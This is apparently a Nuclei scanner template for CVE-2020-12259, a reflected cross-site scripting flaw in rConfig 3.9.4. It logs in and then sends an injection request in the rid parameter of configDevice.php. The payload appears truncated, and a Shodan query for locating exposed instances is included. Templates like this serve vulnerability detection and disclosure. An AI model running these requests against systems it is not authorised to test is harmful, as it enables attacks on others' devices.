id: CVE-2020-12259 info: name: rConfig 3.9.4 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php reference: - https://www.rconfig.com/downloads/rconfig-3.9.4.zip - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 - https://nvd.nist.gov/vuln/detail/CVE-2020-12259 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2020-12259 cwe-id: CWE-79 epss-score: 0.16256 epss-percentile: 0.95461 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: "true" max-request: 3 vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" tags: cve,cve2020,rconfig,authenticated,xss http: - raw: - | GET /login.php HTTP/1.1 Host: {{Hostname}} - | POST /lib/crud/userprocess.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user={{username}}&pass={{password}}&sublogin=1 - | GET /configDevice.php?rid="> HTTP/1.1 Host: {{Hostname}} cookie-reuse: true host-redirects: true matchers: - type: dsl dsl: - 'status_code_3 == 200' - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - 'contains(content_type_3, "text/html")' condition: and # digest: 490a004630440220682762b83dfe34df0984814020b8e08f9b1b837a3a110e745b38fe935b4d8cc602207478b7b9b682946f02bebf9fb6449fa3caa6220fa1be9098fa2e3a6617e9e028:922c64590222798bb761d5b6d8e72950